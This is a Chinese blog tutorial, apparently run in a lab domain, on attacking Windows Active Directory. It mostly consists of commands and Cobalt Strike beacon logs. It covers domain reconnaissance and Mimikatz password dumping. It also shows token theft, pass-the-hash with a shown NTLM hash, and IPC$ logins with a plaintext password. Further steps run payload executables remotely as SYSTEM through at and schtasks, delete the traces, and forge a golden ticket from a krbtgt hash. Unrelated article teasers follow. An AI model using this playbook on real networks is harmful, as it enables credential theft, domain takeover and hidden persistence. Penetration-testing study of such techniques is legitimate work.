【内网渗透】内网渗透学习之域渗透常规方法

域渗透常规方法和思路

    • 1、域内信息收集
      • 1.1、获取当前用户信息
        • 1.1.1、获取当前用户与域 SID
        • 1.1.2、查询指定用户的详细信息
      • 1.2、判断是否存在域
      • 1.2、查询域内所有计算机
      • 1.3、查询域内所有用户组列表
      • 1.4、查询所有域成员计算机列表
      • 1.5、获取域密码信息
      • 1.6、获取域信任信息
      • 1.7、查找域控制器
        • 1.7.1、判断用户是否在域
        • 1.7.2、查看域控制器的机器名
        • 1.7.3、查看域控制的主机名
        • 1.7.4、查看域控 IP
        • 1.7.5、查看域控制的主机名
        • 1.7.6、查看域控制器组
      • 1.8、查询当前域内存活主机
    • 2、判断本地管理员
    • 3、运行 Mimikatz读取密码
    • 4、登录认证
      • 4.1、Access Token 登录令牌
      • 4.2、散列认证
      • 4.3、IPC 连接
      • 4.4、黄金票据(Golden Ticket)

1、域内信息收集

1.1、获取当前用户信息

1.1.1、获取当前用户与域 SID

whoami /all

在这里插入图片描述

1.1.2、查询指定用户的详细信息
# 查询本地用户详细信息
net user user01


# 查询域用户详细信息
net user tester01 /domain

在这里插入图片描述

在这里插入图片描述

1.2、判断是否存在域

ipconfig /all
systeminfo

在这里插入图片描述
在这里插入图片描述

net view /domain

在这里插入图片描述

  • 若是此命令在显示域处显示 WORKGROUP,则不存在域;
  • 若是报错:发生系统错误 5,则存在域,但该用户不是域用户
net config workstation

在这里插入图片描述

net localgroup administrators 查看本机管理员(通常会包含有域用户)

1.2、查询域内所有计算机

net view /domain:xxx
在这里插入图片描述

1.3、查询域内所有用户组列表

net group /domain
在这里插入图片描述

1.4、查询所有域成员计算机列表

net group "domain computers" /domain

在这里插入图片描述

1.5、获取域密码信息

可以获取域密码策略设置、长短、错误锁定等信息

net accounts /domain
在这里插入图片描述

1.6、获取域信任信息

nltest /domain_trusts
在这里插入图片描述

1.7、查找域控制器

1.7.1、判断用户是否在域

net time /domain
域存在且用户在域内
在这里插入图片描述
存在域,当前用户不是域用户
在这里插入图片描述
当前网络环境为工作组,不存在域
在这里插入图片描述

1.7.2、查看域控制器的机器名

nltest /dclist:god在这里插入图片描述

1.7.3、查看域控制的主机名

nslookup -type=SRV _ldap._tcp
在这里插入图片描述

1.7.4、查看域控 IP

ping DC.test.lab
在这里插入图片描述

nslookup dc
在这里插入图片描述
判断域控制器和DNS 服务器是否在同一服务器上
nslookup test.lab
在这里插入图片描述

1.7.5、查看域控制的主机名

nslookup -type=SRV _ldap._tcp
在这里插入图片描述

1.7.6、查看域控制器组

net group "domain controllers" /domain
在这里插入图片描述

实际网络中,一个域内一般存在两台或两台以上的域控制器,作为主备。

netdom query pdc

netdom不是系统自带工具,需要下载安装

1.8、查询当前域内存活主机

利用 windows 内置命令收集

net group "domain computers" /domain
在这里插入图片描述
利用NetBIOS 探测内网
nbtscan 192.168.52.0/24
在这里插入图片描述

2、判断本地管理员

net localgroup "administrators"
在这里插入图片描述

3、运行 Mimikatz读取密码

在这里插入图片描述
在这里插入图片描述

4、登录认证

4.1、Access Token 登录令牌

Access Token : 保存了当前用户的权限信息,每个进程可能使用不同用户的身份启动,有不同的Access Token。如果我们想以域用户的身份做操作,这个时候就可以获得本地域用户身份的进程,然后进行token窃取。

以下是令牌窃取的过程:

  1. 使用 ps 列出进程
  2. 使用 steal_token [pid] 窃取令牌
  3. 使用 getuid 找到你是谁
  4. 使用 rev2self移除令牌

方法1:偷取token

到进程中偷取token:
在这里插入图片描述
右键要横向的主机,选择psexec64:
在这里插入图片描述
选择一个已经获得的凭据或者勾选使用当前令牌,并选择监听器与会话即可:
在这里插入图片描述

当密码输入错误时,执行上面的两个命令就会提示 登录失败: 未知的用户名或错误密码。 同样的使用 rev2self 可除去当前令牌,恢复原来的SYSTEM 权限

方法2:制作token
查看当前用户身份信息是否本地域用户,如不是则需要获取本地域用户的进程:

steal_token 2116

使用命令make_token domain\user password伪造一个token:
在这里插入图片描述
查看一下当前会话 uid

在这里插入图片描述

访问dc的默认共享:
在这里插入图片描述

4.2、散列认证

  • mimikatz 使用登录令牌开启了一个进程,在单点登录信息那里填入我们提供的用户名称、域、密码哈希值
  • cobalt strike自动的从那个进程中窃取令牌并关闭

复制ntm哈希
在这里插入图片描述
pth 命令获取信任
pth GOD\Administrator f76d5be6348a96263e8bcb0f49552fbb
在这里插入图片描述
在这里插入图片描述

最后使用命令移除当前窃取的令牌

rev2self

4.3、IPC 连接

IPC ( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。
通过 ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

  • 利用条件:

    • 开启了139、445端口;
    • 管理员开启了默认共享;
  • 连接失败原因:

    • 用户名密码错误。
    • 目标没有打开ipc$默认共享。
    • 不能成功连接目标的139、445端口
    • 命令输入错误。

建立一个ipc$
前提需要获取到账号密码,需要使用logonpasswords读取
在这里插入图片描述

shell net use \\192.168.52.138\ipc$ "xiaoc@123" /user:administrator
在这里插入图片描述
在使用net use 命令与远程目标机器建立ipc$后,可以使用dir 命令列出远程主机中的文件。

shell dir \\192.168.52.138\c$
在这里插入图片描述
在使用net use 命令与远程目标机器建立ipc$后,可以未使用tasklist命令的/S参数列出远程主机上运行的进程。

使用net time命令确定远程机器当前的系统时间。
在这里插入图片描述

shell tasklist /S 192.168.52.138
在这里插入图片描述

添加计划任务

at是Windows自带的用于创建计时任务的命令,它主要工作在Windows Server 2008
之前版本的操作系统中。使用at命令在远程目标机器上创建计划任务的流程大致如下 因为当前域控服务器使用的是server2008

复制远程文件到目标服务器上(域控服务器,假设可以出网)
shell copy C:\Users\Administrator\Desktop\testartifact_x86.exe \\192.168.52.138\c$
在这里插入图片描述
在这里插入图片描述
使用at命令添加定时执行payload文件
shell at \\192.168.52.138 9:22:00 c:\testartifact_x86.exe
在这里插入图片描述
执行成功
在这里插入图片描述
删除使用at 命令创建计划任务的记录。
shell at \\10.1.1.2 2 /del

Windows Vista、Windows Server 2008 及之后版本的操作系统已经将at命令废弃了。于是,攻击者开始使用schtasks命令代替at命令。schtasks命令比 at命令更为灵活、自由。

shell schtasks /create /s 10.1.1.2 /tn test /sc onstart /tr c:\test_msf_local.exe /ru system /f
这条命令的解释是在IP 为10.1.1.2主机上创建一个开启自启动的定时任务,定时任务名称为test,以system 的权限执test_msf_local.exe。若定时任务存在,则发出警告。如果未与目标主机建立IPC连接,需要输入用户名和密码的参数,在末尾追加:/u administrator /p “密码”。

在使用schtasks命令时,会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显,可以配合ipc$执行文件,使用type命令远程查看执行结果。

删除任务
schtasks /delete /s 10.1.1.2 /tn "test" /f

删除ipc$连接

  • net use \\目标ip /del /y

  • 在使用schtasks命令时,会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt。如果执行schtasks命令后没有回显,可以配合ipc$执行文件,使用type命令远程查看执行结果。

4.4、黄金票据(Golden Ticket)

获取用户名、域名、域的SID值

# 获取当前域
[07/10 10:43:39] beacon> shell net view /domain
[07/10 10:43:39] [*] Tasked beacon to run: net view /domain
[07/10 10:43:40] [+] host called home, sent: 47 bytes
[07/10 10:43:53] [+] received output:
Domain

-------------------------------------------------------------------------------
GOD                  
命令成功完成。

# 获取域内用户
[07/10 10:44:17] beacon> shell net view /domain:god
[07/10 10:44:17] [*] Tasked beacon to run: net view /domain:god
[07/10 10:44:17] [+] host called home, sent: 51 bytes
[07/10 10:44:43] [+] received output:
服务器名称            注解

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
命令成功完成。


[07/10 10:45:02] beacon> shell whoami /user
[07/10 10:45:02] [*] Tasked beacon to run: whoami /user
[07/10 10:45:02] [+] host called home, sent: 43 bytes
[07/10 10:45:02] [+] received output:

用户信息
----------------

用户名            SID                                          
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500
#域的 SID 值即安全标识符 Security Identifiers,使用 whoami /user 命令可查看,注意不需要 SID 最后的一组数字
#SID 就是S-1-5-21-2952760202-1353902439-2381784089

获取DC 中 KRBTGT 用户的 NTLM 哈希

DC 中 KRBTGT 用户的 NTLM 哈希可以通过 dcsync 或 hashdump 获得,也可以使用powershell加载mimikatz获取

OWA\krbtgt 58e91a5ac358d86513ab224312314061

在这里插入图片描述

右击会话,生成黄金票据
在这里插入图片描述

注意: Domain 需要填写成 FQDN 格式,即完全合格域名 Fully Qualified Domain Name ,也就是类似于
teamssix.com 的格式

[07/10 10:57:38] beacon> mimikatz kerberos::golden /user:administrator /domain:god.cm /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt
[07/10 10:57:38] [*] Tasked beacon to run mimikatz's kerberos::golden /user:administrator /domain:god.cm /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /endin:480 /renewmax:10080 /ptt command
[07/10 10:57:38] [+] host called home, sent: 313667 bytes
[07/10 10:57:40] [+] received output:
User      : administrator
Domain    : god.cm (GOD)
SID       : S-1-5-21-2952760202-1353902439-2381784089
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: 58e91a5ac358d86513ab224312314061 - rc4_hmac_nt      
Lifetime  : 2024/7/10 10:57:38 ; 2024/7/10 18:57:38 ; 2024/7/17 10:57:38
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'administrator @ god.cm' successfully submitted for current session

建立好黄金票据之后内可以使用命令判断当前权限(票据存在生存时间过期失效)

shell dir \\DC\C$

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/789459.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

最短路径算法:Dijkstra算法探险记

想象一下,你是一只小蚂蚁,名字叫小明。你住在一个大大的花园里,这个花园有很多小路,小路之间还有交叉点,就像是一个迷宫一样。现在,你接到了一个任务:找到从你家到花园里一个特定地方(比如一块超级大的糖果)的最短路径! 第一步:画出地图 首先,我们需要一张地图来…

YOLOv8改进 | 注意力机制 | 增强模型在图像分类和目标检测BAM注意力【小白必备 + 附完整代码】

秋招面试专栏推荐 :深度学习算法工程师面试问题总结【百面算法工程师】——点击即可跳转 💡💡💡本专栏所有程序均经过测试,可成功执行💡💡💡 专栏目录 :《YOLOv8改进有效…

【模块化与包管理】:解锁【Python】编程的高效之道

目录 1.什么是模块? 2. 模块的导入过程 3. 理解命名空间 4. import语句的多种形式 5. 模块的执行与重新导入 6. 包(Package) 7. sys模块和os模块 sys模块 常用属性 示例:使用sys模块 os模块 常用功能 示例&#xff1…

前端埋点数据收集和数据上报

原文地址 什么是埋点 学名叫时间追踪(Event Tracking), 主要针对用户行为或者业务过程进行捕获,处理和发送相关技术及实施过程. 埋点是数据领域的一个专业术语,也是互联网领域的俗称,是互联网领域的俗称 埋点是产品数据分析的基础&#xf…

【AIGC】一、本地docker启动私有大模型

本地docker启动私有大模型 一、最终效果中英文对话生成代码 二、资源配置三、搭建步骤启动docker容器登录页面首次登录请注册登录后的效果 配置模型尝试使用选择模型选项下载模型选择适合的模型开始下载 试用效果返回首页选择模型中英文对话生成代码 四、附录资源监控 五、参考…

动手学深度学习54 循环神经网络

动手学深度学习54 循环神经网络 1. 循环神经网络RNN2. QA 1. 循环神经网络RNN h t h_t ht​ 与 h t − 1 h_{t-1} ht−1​ x t − 1 x_{t-1} xt−1​有关 x t x_t xt​ 与 h t h_t ht​ x t − 1 x_{t-1} xt−1​ 有关 怎么把潜变量变成RNN–假设更简单 潜变量和隐变量的区…

Java面试八股之什么是布隆过滤器

什么是布隆过滤器 布隆过滤器(Bloom Filter)是一种空间效率极高的概率型数据结构,用于判断一个元素是否可能存在于一个集合中。布隆过滤器可以给出“可能存在”或“一定不存在”的答案,但不能保证“一定存在”。其主要特点是&…

WTM的项目中EFCore如何适配人大金仓数据库

一、WTM是什么 WalkingTec.Mvvm框架(简称WTM)最早开发与2013年,基于Asp.net MVC3 和 最早的Entity Framework, 当初主要是为了解决公司内部开发效率低,代码风格不统一的问题。2017年9月,将代码移植到了.Net Core上&…

开源项目有哪些机遇与挑战

目录 1.概述 2.开源项目的发展趋势 2.1. 开源项目的发展现状 2.2. 开源社区的活跃度 2.3. 开源项目在技术创新中的作用 3.参与开源的经验分享 3.1. 选择开源项目 3.2. 理解项目结构和文档 3.3. 贡献代码 3.4. 与开源社区的合作 3.5. 学习和成长 4.开源项目的挑战 …

buuctf 二维码

文件下载下来是一个png的文件 做misc永远的好习惯就是先运行,后010 先运行,这个运行肯定就是扫码 啥也没有 里面还有个ZIP文件(zip的发明人名字是PK) 放在kali上binwalk分离 CTF工具隐写分离神器Binwalk安装和详细使用方法_binwalk下载-CSDN博客 里面有个text,需要密码 我…

ESP32驱动摄像头:1.驱动OV2640模块(待验证)

一、装ArduCam库和ESPAsyncWebServer库 二、参考代码 #include <Wire.h> #include <ArduCAM.h> #include <SPI.h> #include <WiFi.h> #include <ESPAsyncWebServer.h>#define CAM_CS 32 // modify according to your own wiring #define OV2640…

IP 地址:优化网络游戏

IP地址和网络游戏 在现代网络游戏中&#xff0c;IP地址不仅用于服务器分配&#xff0c;还能针对性进行玩家匹配与优化网络延迟。本文将探讨IP地址在网络游戏中的具体应用。 *服务器分配* 全球服务器分布&#xff1a; 网络游戏需要在全球范围内提供快速、稳定的连接&#xff…

【机器学习】主成分分析(PCA):数据降维的艺术

&#x1f308;个人主页: 鑫宝Code &#x1f525;热门专栏: 闲话杂谈&#xff5c; 炫酷HTML | JavaScript基础 ​&#x1f4ab;个人格言: "如无必要&#xff0c;勿增实体" 文章目录 主成分分析&#xff08;PCA&#xff09;&#xff1a;数据降维的艺术引言PCA的基…

【TypeScript 学习】TypeScript 枚举类型发散:基于位运算的权限管理 CRUD 操作

文章目录 TypeScript 枚举类型发散&#xff1a;基于位运算的权限管理 CRUD 操作1 问题由来2 具体实现2.1 新增权限2.2 删除权限2.3 查询权限&#xff08;即判定存在与否&#xff09;2.4 修改权限2.5 完整测试 3 小结 TypeScript 枚举类型发散&#xff1a;基于位运算的权限管理 …

鸿蒙开发:Universal Keystore Kit(密钥管理服务)【加解密(C/C++)】

加解密(C/C) 以AES 256密钥为例&#xff0c;完成加解密。具体的场景介绍及支持的算法规格。 在CMake脚本中链接相关动态库 target_link_libraries(entry PUBLIC libhuks_ndk.z.so)开发步骤 生成密钥 指定密钥别名。初始化密钥属性集。调用OH_Huks_GenerateKeyItem生成密钥)…

[Linux安全运维] Linux用户以及权限管理

Linux用户以及权限管理 Linux用户和组 用户信息文件pasawd /etc/passwd文件用于存储用户的信息 :用于分割不同的字段信息 字段示例&#xff08;第一行&#xff09;含义说明1root用户名2x密码占位符x代表用户有密码存储在shadow文件中无内容代表用户登录系统不需要密码30UID…

一款24小时实时检测的六氟化硫气体泄漏报警系统

尽管当前工业生产模式越来越趋于自动化、智能化&#xff0c;但安全生产仍然是时下屡被提及的话题。在配电室等使用六氟化硫气体的众多领域中&#xff0c;由于气体泄漏而引发的中毒、火灾、爆炸、窒息事故仍高发频发。因此&#xff0c;安装六氟化硫气体泄漏报警监测系统仍是企业…

C语言 | Leetcode C语言题解之第226题翻转二叉树

题目&#xff1a; 题解&#xff1a; struct TreeNode* invertTree(struct TreeNode* root) {if (root NULL) {return NULL;}struct TreeNode* left invertTree(root->left);struct TreeNode* right invertTree(root->right);root->left right;root->right le…

如何探索高效知识管理:FlowUs知识库体验很好

在当今信息爆炸的时代&#xff0c;有效的知识管理对于个人和团队的发展至关重要。FlowUs 知识库作为一款创新的知识管理工具&#xff0c;正逐渐成为众多用户的首选&#xff0c;为他们带来了高效、便捷和有条理的知识管理体验。 FlowUs 知识库的一大特色在于其简洁直观的界面设计…

基于单片机的温控光控智能窗帘设计探讨

摘 要&#xff1a; 文章使用的核心原件是 AT89C52 单片机&#xff0c;以此为基础进行模块化的设计&#xff0c;在整个设计中通过加入光检测模块和温度检测模块&#xff0c;从而对室内的温度和光照强度进行检测&#xff0c;然后将检测得到的数据传输给单片机&#xff0c;单片机…